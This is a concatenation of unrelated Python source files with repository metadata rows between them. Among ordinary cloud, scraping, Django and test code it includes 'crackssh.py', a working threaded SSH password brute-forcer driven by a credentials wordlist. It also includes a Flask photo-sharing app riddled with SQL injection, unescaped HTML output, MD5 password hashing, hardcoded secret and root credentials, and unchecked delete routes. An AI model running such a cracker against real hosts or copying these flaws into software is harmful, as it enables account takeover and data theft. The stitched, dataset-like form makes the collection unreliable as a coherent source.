class ResourceManager(object):
REQUIRED_SERVICE = None
REPR_KEYS = ("id", "name", "tenant_id", "zone", "zoneName", "pool")
def __init__(self, clients):
self.clients = clients
def is_available(self):
if self.REQUIRED_SERVICE:
return self.REQUIRED_SERVICE in self.clients.services().values()
return True
@property
def client(self):
return getattr(self.clients, self.__class__.__name__.lower())()
def get_resources(self):
all_resources = []
cls = self.__class__.__name__.lower()
for prop in dir(self):
if not prop.startswith("list_"):
continue
f = getattr(self, prop)
resources = f() or []
resource_name = prop[5:][:-1]
for res in resources:
# NOTE(stpierre): It'd be nice if we could make this a
# dict, but then we get ordering issues. So a list of
# 2-tuples it must be.
res_repr = []
for key in self.REPR_KEYS + (resource_name,):
if isinstance(res, dict):
value = res.get(key)
else:
value = getattr(res, key, None)
if value:
res_repr.append((key, value))
if not res_repr:
raise ValueError("Failed to represent resource %r" % res)
res_repr.extend([("class", cls),
("resource_name", resource_name)])
all_resources.append(res_repr)
return all_resources
class Keystone(ResourceManager):
REQUIRED_SERVICE = consts.Service.KEYSTONE
def list_users(self):
return self.client.users.list()
def list_tenants(self):
if hasattr(self.client, "projects"):
return self.client.projects.list() # V3
return self.client.tenants.list() # V2
def list_roles(self):
return self.client.roles.list()
class Nova(ResourceManager):
REQUIRED_SERVICE = consts.Service.NOVA
def list_flavors(self):
return self.client.flavors.list()
def list_floating_ip_pools(self):
return self.client.floating_ip_pools.list()
def list_floating_ips(self):
return self.client.floating_ips.list()
def list_images(self):
return self.client.images.list()
def list_keypairs(self):
return self.client.keypairs.list()
def list_networks(self):
return self.client.networks.list()
def list_security_groups(self):
return self.client.security_groups.list(
search_opts={"all_tenants": True})
def list_servers(self):
return self.client.servers.list(
search_opts={"all_tenants": True})
def list_services(self):
return self.client.services.list()
def list_availability_zones(self):
return self.client.availability_zones.list()
class Neutron(ResourceManager):
REQUIRED_SERVICE = consts.Service.NEUTRON
def has_extension(self, name):
extensions = self.client.list_extensions().get("extensions", [])
return any(ext.get("alias") == name for ext in extensions)
def list_networks(self):
return self.client.list_networks()["networks"]
def list_subnets(self):
return self.client.list_subnets()["subnets"]
def list_routers(self):
return self.client.list_routers()["routers"]
def list_ports(self):
return self.client.list_ports()["ports"]
def list_floatingips(self):
return self.client.list_floatingips()["floatingips"]
def list_security_groups(self):
return self.client.list_security_groups()["security_groups"]
def list_health_monitors(self):
if self.has_extension("lbaas"):
return self.client.list_health_monitors()["health_monitors"]
def list_pools(self):
if self.has_extension("lbaas"):
return self.client.list_pools()["pools"]
def list_vips(self):
if self.has_extension("lbaas"):
return self.client.list_vips()["vips"]
class Glance(ResourceManager):
REQUIRED_SERVICE = consts.Service.GLANCE
def list_images(self):
return self.client.images.list()
class Heat(ResourceManager):
REQUIRED_SERVICE = consts.Service.HEAT
def list_resource_types(self):
return self.client.resource_types.list()
def list_stacks(self):
return self.client.stacks.list()
class Cinder(ResourceManager):
REQUIRED_SERVICE = consts.Service.CINDER
def list_availability_zones(self):
return self.client.availability_zones.list()
def list_backups(self):
return self.client.backups.list()
def list_volume_snapshots(self):
return self.client.volume_snapshots.list()
def list_volume_types(self):
return self.client.volume_types.list()
def list_volumes(self):
return self.client.volumes.list(
search_opts={"all_tenants": True})
class Senlin(ResourceManager):
REQUIRED_SERVICE = consts.Service.SENLIN
def list_clusters(self):
return self.client.clusters()
def list_profiles(self):
return self.client.profiles()
class Watcher(ResourceManager):
REQUIRED_SERVICE = consts.Service.WATCHER
REPR_KEYS = ("uuid", "name")
def list_audits(self):
return self.client.audit.list()
def list_audit_templates(self):
return self.client.audit_template.list()
def list_goals(self):
return self.client.goal.list()
def list_strategies(self):
return self.client.strategy.list()
def list_action_plans(self):
return self.client.action_plan.list()
class CloudResources(object):
"""List and compare cloud resources.
resources = CloudResources(auth_url=..., ...)
saved_list = resources.list()
# Do something with the cloud ...
changes = resources.compare(saved_list)
has_changed = any(changes)
removed, added = changes
"""
def __init__(self, **kwargs):
self.clients = osclients.Clients(objects.Credential(**kwargs))
def _deduplicate(self, lst):
"""Change list duplicates to make all items unique.
>>> resources._deduplicate(["a", "b", "c", "b", "b"])
>>> ['a', 'b', 'c', 'b (duplicate 1)', 'b (duplicate 2)'
"""
deduplicated_list = []
for value in lst:
if value in deduplicated_list:
ctr = 0
try_value = value
while try_value in deduplicated_list:
ctr += 1
try_value = "%s (duplicate %i)" % (value, ctr)
value = try_value
deduplicated_list.append(value)
return deduplicated_list
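The docstring example above can be reproduced with a standalone version of the same algorithm (a sketch, detached from the class for illustration):

```python
def deduplicate(lst):
    # same algorithm as _deduplicate above
    out = []
    for value in lst:
        if value in out:
            ctr = 0
            try_value = value
            while try_value in out:
                ctr += 1
                try_value = "%s (duplicate %i)" % (value, ctr)
            value = try_value
        out.append(value)
    return out

print(deduplicate(["a", "b", "c", "b", "b"]))
# prints: ['a', 'b', 'c', 'b (duplicate 1)', 'b (duplicate 2)']
```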
def list(self):
managers_classes = discover.itersubclasses(ResourceManager)
resources = []
for cls in managers_classes:
manager = cls(self.clients)
if manager.is_available():
resources.extend(manager.get_resources())
return sorted(self._deduplicate(resources))
def compare(self, with_list):
# NOTE(stpierre): Each resource is either a list of 2-tuples,
# or a list of lists. (JSON doesn't honor tuples, so when we
# load data from JSON our tuples get turned into lists.) It's
# easiest to do the comparison with sets, so we need to change
# it to a tuple of tuples so that it's hashable.
saved_resources = set(tuple(tuple(d) for d in r) for r in with_list)
current_resources = set(tuple(tuple(d) for d in r)
for r in self.list())
removed = saved_resources - current_resources
added = current_resources - saved_resources
return (sorted(removed), sorted(added))
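The tuple-of-tuples conversion above exists only to make each resource hashable so the diff reduces to set subtraction. A toy demonstration with made-up resource lists (not real cloud data):

```python
# Each resource is a list of 2-tuples; JSON round-trips turn tuples into lists,
# so both sides are normalized to tuples of tuples before the set diff.
saved = [[("id", "1")], [("id", "2")]]
current = [[("id", "2")], [("id", "3")]]

saved_set = set(tuple(tuple(d) for d in r) for r in saved)
current_set = set(tuple(tuple(d) for d in r) for r in current)

removed = sorted(saved_set - current_set)
added = sorted(current_set - saved_set)
print(removed, added)
# prints: [(('id', '1'),)] [(('id', '3'),)]
```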
def _print_tabular_resources(resources, table_label):
cliutils.print_list(
objs=[dict(r) for r in resources],
fields=("class", "resource_name", "identifiers"),
field_labels=("service", "resource type", "identifiers"),
table_label=table_label,
formatters={"identifiers":
lambda d: " ".join("%s:%s" % (k, v)
for k, v in d.items()
if k not in ("class", "resource_name"))}
)
print("")
def main():
parser = argparse.ArgumentParser(
description=("Save list of OpenStack cloud resources or compare "
"with previously saved list."))
parser.add_argument("--credentials",
type=argparse.FileType("r"),
metavar="<path/to/credentials.json>",
help="cloud credentials in JSON format")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--dump-list",
type=argparse.FileType("w"),
metavar="<path/to/output/list.json>",
help="dump resources to given file in JSON format")
group.add_argument("--compare-with-list",
type=argparse.FileType("r"),
metavar="<path/to/existent/list.json>",
help=("compare current resources with a list from "
"given JSON file"))
args = parser.parse_args()
if args.credentials:
config = json.load(args.credentials)
else:
config = json.loads(subprocess.check_output(["rally", "deployment",
"config"]))
config.update(config.pop("admin"))
del config["type"]
if "users" in config:
del config["users"]
resources = CloudResources(**config)
if args.dump_list:
resources_list = resources.list()
json.dump(resources_list, args.dump_list)
elif args.compare_with_list:
given_list = json.load(args.compare_with_list)
changes = resources.compare(with_list=given_list)
removed, added = changes
# filter out expected additions
expected = []
for resource_tuple in added:
resource = dict(resource_tuple)
if ((resource["class"] == "keystone" and
resource["resource_name"] == "role" and
resource["name"] == "_member_") or
(resource["class"] == "nova" and
resource["resource_name"] == "security_group" and
resource["name"] == "default")):
expected.append(resource_tuple)
for resource in expected:
added.remove(resource)
if removed:
_print_tabular_resources(removed, "Removed resources")
if added:
_print_tabular_resources(added, "Added resources (unexpected)")
if expected:
_print_tabular_resources(expected, "Added resources (expected)")
if any(changes):
return 0 # `1' will fail gate job
return 0
if __name__ == "__main__":
sys.exit(main())
| 31.041344 | 79 | 0.60909 | 1,387 | 12,013 | 5.116078 | 0.235761 | 0.05637 | 0.085682 | 0.09301 | 0.212937 | 0.105271 | 0.101325 | 0.081877 | 0.060457 | 0.048337 | 0 | 0.001984 | 0.286606 | 12,013 | 386 | 80 | 31.121762 | 0.826021 | 0.124615 | 0 | 0.096774 | 0 | 0 | 0.086068 | 0.007676 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0 | 0.03629 | 0.137097 | 0.508065 | 0.024194 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
73c5fca4b05d55a87ba8fe8974efdfc3a6abf540 | 1,096 | py | Python | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | 4 | 2020-07-02T09:26:54.000Z | 2021-11-26T04:01:07.000Z | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | null | null | null | test/insert-encrypted.py | uvm-plaid/duet-sgx | 6a53508b7bb7754e6c31ab1dadc4ae48e7d84f16 | [
"MIT"
] | 2 | 2020-10-27T14:40:22.000Z | 2021-11-27T02:54:52.000Z | import json
import requests
import base64
import Crypto
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA
#from Crypto import Random
#with open('/tmp/duetpublickey') as key_file:
# key_data=key_file.read()
key_data = requests.get("http://localhost:5000/pubkey")
key_json = key_data.json()
e = key_json['e']
n = key_json['n']
#print("Key Size (bits): " + str(key_json['size'] * 8))
#print("e: " + str(e))
#print("n: " + str(n))
#print("")
public_key = RSA.construct((long(n), long(e)))
print(public_key.exportKey())
message = "1,27"
# default hash Algorithm is SHA1, mask generation function is MGF1, no label is specified
# https://pycryptodome.readthedocs.io/en/latest/src/cipher/oaep.html
cipher = PKCS1_OAEP.new(public_key)
encrypted_message = base64.encodestring(cipher.encrypt(message)).replace("\n","")
data = { "value" : encrypted_message }
headers = { 'Content-type': 'application/json', 'Accept': 'application/json' }
requests.post('http://localhost:5000/insert', data=json.dumps(data), headers=headers)
#print(encrypted_message)
| 30.444444 | 89 | 0.729015 | 160 | 1,096 | 4.8875 | 0.46875 | 0.051151 | 0.043478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02045 | 0.107664 | 1,096 | 35 | 90 | 31.314286 | 0.779141 | 0.347628 | 0 | 0 | 0 | 0 | 0.168794 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
73c83b791af6ab33697d10f7cddf574a8e966214 | 95 | py | Python | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | 3 | 2018-08-14T09:33:52.000Z | 2022-03-21T12:31:58.000Z | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | src/lesson_the_internet/http_cookies_setheaders.py | jasonwee/asus-rt-n14uhp-mrtg | 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | [
"Apache-2.0"
] | null | null | null | from http import cookies
c = cookies.SimpleCookie()
c['mycookie'] = 'cookie_value'
print(c)
| 11.875 | 30 | 0.715789 | 13 | 95 | 5.153846 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147368 | 95 | 7 | 31 | 13.571429 | 0.82716 | 0 | 0 | 0 | 0 | 0 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73df3c0eb8fec2b7771ceae6cfb845c8b3b75d43 | 5,726 | py | Python | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | platon/beacon/main.py | shinnng/platon.py | 3197fac3839896290210da04dd0d45f0bdc731ce | [
"MIT"
] | null | null | null | from typing import (
Any,
Dict,
)
import requests
from platon.module import (
Module,
)
class Beacon(Module):
    def __getattribute__(self, name):
        raise ModuleNotFoundError('This module is not available')
# def __init__(
# self,
# base_url: str,
# session: requests.Session = requests.Session(),
# ) -> None:
# self.base_url = base_url
# self.session = session
#
# def _make_get_request(self, endpoint: str) -> Dict[str, Any]:
# url = self.base_url + endpoint
# response = self.session.get(url)
# response.raise_for_status()
# return response.json()
#
# # [ BEACON endpoints ]
#
# def get_genesis(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/genesis"
# return self._make_get_request(endpoint)
#
# def get_hash_root(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/root"
# return self._make_get_request(endpoint)
#
# def get_fork_data(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/fork"
# return self._make_get_request(endpoint)
#
# def get_finality_checkpoint(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/finality_checkpoints"
# return self._make_get_request(endpoint)
#
# def get_validators(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validators"
# return self._make_get_request(endpoint)
#
# def get_validator(
# self, validator_id: str, state_id: str = "head"
# ) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validators/{validator_id}"
# return self._make_get_request(endpoint)
#
# def get_validator_balances(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/validator_balances"
# return self._make_get_request(endpoint)
#
# def get_epoch_committees(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/states/{state_id}/committees"
# return self._make_get_request(endpoint)
#
# def get_block_headers(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/headers"
# return self._make_get_request(endpoint)
#
# def get_block_header(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/headers/{block_id}"
# return self._make_get_request(endpoint)
#
# def get_block(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}"
# return self._make_get_request(endpoint)
#
# def get_block_root(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}/root"
# return self._make_get_request(endpoint)
#
# def get_block_attestations(self, block_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/beacon/blocks/{block_id}/attestations"
# return self._make_get_request(endpoint)
#
# def get_attestations(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/attestations"
# return self._make_get_request(endpoint)
#
# def get_attester_slashings(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/attester_slashings"
# return self._make_get_request(endpoint)
#
# def get_proposer_slashings(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/proposer_slashings"
# return self._make_get_request(endpoint)
#
# def get_voluntary_exits(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/beacon/pool/voluntary_exits"
# return self._make_get_request(endpoint)
#
# # [ CONFIG endpoints ]
#
# def get_fork_schedule(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/fork_schedule"
# return self._make_get_request(endpoint)
#
# def get_spec(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/spec"
# return self._make_get_request(endpoint)
#
# def get_deposit_contract(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/config/deposit_contract"
# return self._make_get_request(endpoint)
#
# # [ DEBUG endpoints ]
#
# def get_beacon_state(self, state_id: str = "head") -> Dict[str, Any]:
# endpoint = f"/platon/v1/debug/beacon/states/{state_id}"
# return self._make_get_request(endpoint)
#
# def get_beacon_heads(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/debug/beacon/heads"
# return self._make_get_request(endpoint)
#
# # [ NODE endpoints ]
#
# def get_node_identity(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/identity"
# return self._make_get_request(endpoint)
#
# def get_peers(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/peers"
# return self._make_get_request(endpoint)
#
# def get_peer(self, peer_id: str) -> Dict[str, Any]:
# endpoint = f"/platon/v1/node/peers/{peer_id}"
# return self._make_get_request(endpoint)
#
# def get_health(self) -> int:
# endpoint = "/platon/v1/node/health"
# url = self.base_url + endpoint
# response = self.session.get(url)
# return response.status_code
#
# def get_version(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/version"
# return self._make_get_request(endpoint)
#
# def get_syncing(self) -> Dict[str, Any]:
# endpoint = "/platon/v1/node/syncing"
# return self._make_get_request(endpoint)

# polls/migrations/0002_auto_20211016_1704.py
# repo: vowatchka/fabrique_test_task (MIT)
] | null | null | null | # Generated by Django 2.2.10 on 2021-10-16 14:04
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='choice',
options={'verbose_name': 'вариант ответа', 'verbose_name_plural': 'варианты ответов'},
),
migrations.AlterModelOptions(
name='poll',
options={'verbose_name': 'опрос', 'verbose_name_plural': 'опросы'},
),
migrations.AlterModelOptions(
name='question',
options={'verbose_name': 'вопрос', 'verbose_name_plural': 'вопросы'},
),
]

# scrapy_crawler/crawler/spiders/base_crawler.py
# repo: Pradip-p/scrapy-py-crawler (MIT)
import os
import sys
import scrapy
from scrapy.crawler import CrawlerProcess
from twisted.internet import reactor
from scrapy.crawler import CrawlerRunner
from scrapy.utils.log import configure_logging
# from scrapy.loader import ItemLoader
from scrapy.utils.project import get_project_settings
from scrapy.loader import ItemLoader
from scrapy_crawler.lib.user_agent import get_user_agent
class LazyBaseCrawler(scrapy.Spider):
name = "scrapy_base_crawler"
allowed_domains = [""]
# START URLS for your project.
start_urls = ['']
    # custom_settings = {
    #     'ITEM_PIPELINES': {
    #         "lazy_crawler.crawler.pipelines.MongoPipeline": 300,
    #     },
    # }

# sec/violent/codes/crackssh.py
# repo: imsilence/notes (Apache-2.0)
# encoding: utf-8
import threading
import argparse
import os
import sys
import pxssh
connect_lock = threading.Semaphore(value=10)
found_event = threading.Event()
def ssh_connect(host, port, user, password):
try:
_client = pxssh.pxssh()
_client.login(host, user, port=port, password=password)
_client.logout()
print '[+] username:%s, password:%s' % (user, password)
found_event.set()
return True
except BaseException as e:
#print '[-] %s, %s, %s' % (user, password, str(e))
return False
finally:
connect_lock.release()
def crack(host, port, wordbook):
fhandler = open(wordbook, 'rb')
for _line in fhandler:
if found_event.isSet():
break
try:
_user, _password = _line.strip().split()[:2]
connect_lock.acquire()
_th = threading.Thread(target=ssh_connect, args=(host, port, _user, _password))
_th.start()
except BaseException as e:
print str(e)
fhandler.close()
if __name__ == '__main__':
_parser = argparse.ArgumentParser()
_parser.add_argument('-T', '--target', help='crack target', default='localhost', type=str)
_parser.add_argument('-P', '--port', help='crack port', default=22, type=int)
_parser.add_argument('-W', '--wordbook', help='user & password workbook', type=str)
_args = _parser.parse_args()
if _args.wordbook is None or \
not os.path.exists(_args.wordbook) or \
not os.path.isfile(_args.wordbook):
_parser.print_help()
sys.exit(-1)
crack(_args.target, _args.port, _args.wordbook)

# flaskapp_reddis.py
# repo: aishiyer18/Photo-Sharing-Network-on-Google-App-Engine (Apache-2.0)
from flask import Flask, request, render_template, session, redirect, url_for, make_response
import MySQLdb, hashlib, os, redis
app = Flask(__name__)
app.secret_key = "1|D0N'T|W4NT|TH15|T0|3E|R4ND0M"
@app.route('/', methods=['POST','GET'])
def register():
if 'username' in session:
return render_template('index.html', username = session['username'])
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
username = request.form['username']
password = request.form['password']
if(username == '' or password == ''):
return render_template('register.html')
sql = "select username from users where username='"+username+"'"
cursor.execute(sql)
if cursor.rowcount == 1:
return render_template('register.html')
sql = "insert into users (username, password) values ('"+username+"','"+hashlib.md5(password).hexdigest()+"')"
cursor.execute(sql)
db.commit()
cursor.close()
return render_template('login.html')
else:
return render_template('register.html')
@app.route('/login', methods=['POST','GET'])
def login():
if 'username' in session:
return render_template('index.html', username = session['username'])
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
username = request.form['username']
password = request.form['password']
sql = "select username from users where username = '"+username+"' and password = '"+hashlib.md5(password).hexdigest()+"'"
cursor.execute(sql)
if cursor.rowcount == 1:
results = cursor.fetchall()
for row in results:
session['username'] = username
return render_template('index.html', username = session['username'])
else:
return render_template('login.html')
else:
return render_template('login.html')
@app.route('/logout', methods=['POST','GET'])
def logout():
if 'username' in session:
session.pop('username', None)
return redirect(url_for('register'))
@app.route('/upload', methods=['POST','GET'])
def upload():
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
file = request.files['file']
file_contents = file.read()
hash = hashlib.md5(file_contents).hexdigest()
sql = "select name from images where username = '"+session['username']+"' and hash = '"+hash+"'"
cursor.execute(sql)
if cursor.rowcount > 0:
return render_template('index.html', username = session['username'])
sql = "insert into images (username, hash, name) values ('"+session['username']+"','"+hash+"','"+file.filename+"')"
cursor.execute(sql)
db.commit()
cursor.close()
key = session['username']+"_"+hash
r.set(key,file_contents)
return redirect(url_for('list'))
else:
return render_template('index.html', username = session['username'])
@app.route('/list', methods=['POST','GET'])
def list():
if 'username' not in session:
return render_template('register.html')
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
sql = "select hash, name from images where username = '"+session['username']+"'"
cursor.execute(sql)
results = cursor.fetchall()
list = '<br><center><a href="login">Back</a></center><br>'
list += '<table border="1"><col width="200"><col width="325"><col width="200"><col width="250"><th>Name</th><th>Image</th><th>Owner</th><th>Options</th>'
for row in results:
hash = row[0]
name = row[1]
key = session['username']+"_"+hash
image = r.get(key)
image = image.encode("base64")
list += "<tr><td>"+name+"</td>"
list += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td>"
list += "<td><center>"+session['username']+"</center></td>"
list += "<td><a href='view?id="+hash+"&u="+session['username']+"'>View</a> "
list += "<a href='delete?id="+hash+"&u="+session['username']+"'>Delete</a> "
list += "<a href='download?id="+hash+"&u="+session['username']+"'>Download</a></td></tr>"
list += '</table>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+list+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/list_all', methods=['POST','GET'])
def list_all():
if 'username' not in session:
return render_template('register.html')
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
sql = "select hash, name, username from images"
cursor.execute(sql)
results = cursor.fetchall()
list = '<br><center><a href="login">Back</a></center><br>'
list += '<table border="1"><col width="200"><col width="325"><col width="200"><col width="250"><th>Name</th><th>Image</th><th>Owner</th><th>Options</th>'
for row in results:
hash = row[0]
name = row[1]
username = row[2]
key = username+"_"+hash
image = r.get(key)
image = image.encode("base64")
list += "<tr><td>"+name+"</td>"
list += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td>"
list += "<td><center>"+username+"</center></td>"
list += "<td><a href='view?id="+hash+"&u="+username+"'>View</a> "
if username == session['username']:
list += "<a href='delete?id="+hash+"&u="+username+"'>Delete</a> "
list += "<a href='download?id="+hash+"&u="+username+"'>Download</a></td></tr>"
list += '</table>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+list+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/view', methods=['GET'])
def view():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
hash = request.args.get('id')
username = request.args.get('u')
sql = "select hash, name from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
view = '<br><center><a href="list">Back</a></center><br>'
view += '<table border="1"><col width="200"><col width="325"><th>Name</th><th>Image</th>'
for row in results:
hash = row[0]
name = row[1]
key = username+"_"+hash
image = r.get(key)
image = image.encode("base64")
view += "<tr><td>"+name+"</td>"
view += "<td><center><img src='data:image/jpeg;base64,"+image+"' height='75%' width='75%'/></center></td></tr>"
view += '</table><br><hr><br>'
view += "<div><form action='comment' method='post'><center>Comment on the image<br><br><textarea name='comment' rows='3' cols='50'></textarea><br><br><input type='hidden' name='username' value= '"+username+"'><input type='hidden' name='hash' value= '"+hash+"'><input type='submit' value='Comment'></center></form></div>"
sql = "select username, comment from comments where owner = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
view += '<table border="1"><col width="100"><col width="500"><th>Username</th><th>Comment</th>'
for row in results:
username = row[0]
comment = row[1]
view += "<tr><td>"+username+"</td>"
view += "<td>"+comment+"</td></tr>"
view += '</table><br><hr><br>'
cursor.close()
return '''<html><head><title>Instagram</title><link rel="stylesheet" href="static/stylesheets/style.css"></head><body>'''+view+'''</body></html>'''
else:
return render_template('index.html', username = session['username'])
@app.route('/comment', methods=['POST','GET'])
def comment():
if request.method == 'POST':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
owner = request.form['username']
hash = request.form['hash']
username = session['username']
comment = request.form['comment']
sql = "insert into comments (username, hash, owner, comment) values ('"+username+"','"+hash+"','"+owner+"','"+comment+"')"
cursor.execute(sql)
db.commit()
cursor.close()
return redirect(url_for('view', id = hash, u = owner))
@app.route('/download', methods=['GET'])
def download():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
hash = request.args.get('id')
username = request.args.get('u')
sql = "select name from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
results = cursor.fetchall()
for row in results:
name = row[0]
key = username+"_"+hash
file_contents = r.get(key)
response = make_response(file_contents)
response.headers["Content-Disposition"] = "attachment; filename="+name
cursor.close()
return response
else:
return render_template('index.html', username = session['username'])
@app.route('/delete', methods=['GET'])
def delete():
if request.method == 'GET':
db = MySQLdb.connect("localhost","root","root","instagram")
cursor = db.cursor()
hash = request.args.get('id')
username = request.args.get('u')
sql = "delete from images where username = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
db.commit()
r = redis.StrictRedis(host='localhost', port=6379, db=0)
key = username+"_"+hash
r.delete(key)
sql = "delete from comments where owner = '"+username+"' and hash = '"+hash+"'"
cursor.execute(sql)
db.commit()
cursor.close()
return redirect(url_for('list'))
if __name__ == '__main__':
    app.run(debug=True)

# electrum_gui/common/coin/data.py
# repo: Umiiii/electrum (MIT)
from dataclasses import dataclass
from electrum_gui.common.basic.dataclass.dataclass import DataClassMixin
@dataclass
class ChainInfo(DataClassMixin):
chain_code: str # unique chain coin
fee_code: str # which coin is used to provide fee (omni chain uses btc, neo uses neo_gas etc.)
name: str # full name of chain
chain_id: str = None # optional, identify multi forked chains by chain_id (use by eth etc.)
@dataclass
class CoinInfo(DataClassMixin):
code: str # unique code
chain_code: str # which chain does it belong to
name: str # full name of coin
symbol: str # symbol of coin
decimals: int # decimals of coin
icon: str # icon url of coin
token_address: str = None # optional, used by tokens

# proctor/tests/test_groups.py
# repo: rhornik-indeed/django-proctor (Apache-2.0)
from __future__ import absolute_import, unicode_literals
from proctor.groups import ProctorGroups, GroupAssignment
class TestProctorGroups:
def test_string_encoding_for_valid_group(self):
# Test valid single test case
groups = ProctorGroups({"test_one": GroupAssignment(group="test", value=0, payload="")})
assert groups.get_group_string_list() == ["test_one0"]
def test_string_encoding_for_null_group(self):
# Test unassigned group. Exercises None type comparison in py3.
groups = ProctorGroups({"test_two": GroupAssignment(group=None, value=None, payload=None)})
assert groups.get_group_string_list() == []
def test_string_encoding_for_inactive_group(self):
groups = ProctorGroups({"test_two": GroupAssignment(group=None, value=-1, payload=None)})
assert groups.get_group_string_list() == []

# tests/test_main.py
# repo: terrorizer1980/Dashboard-api (MIT)
import pytest
# Link what responses we can to one point to keep changes easier
from Utils.Responses import successful_action_response, no_reply_response
from tests import tools
noauth_client = tools.generate_noauth_client()
# TODO: Make a test for when the bot is offline
class TestOther():
def test_metrics(self):
resp = noauth_client.get("/api/metrics")
tools.assure_ok_response(resp)
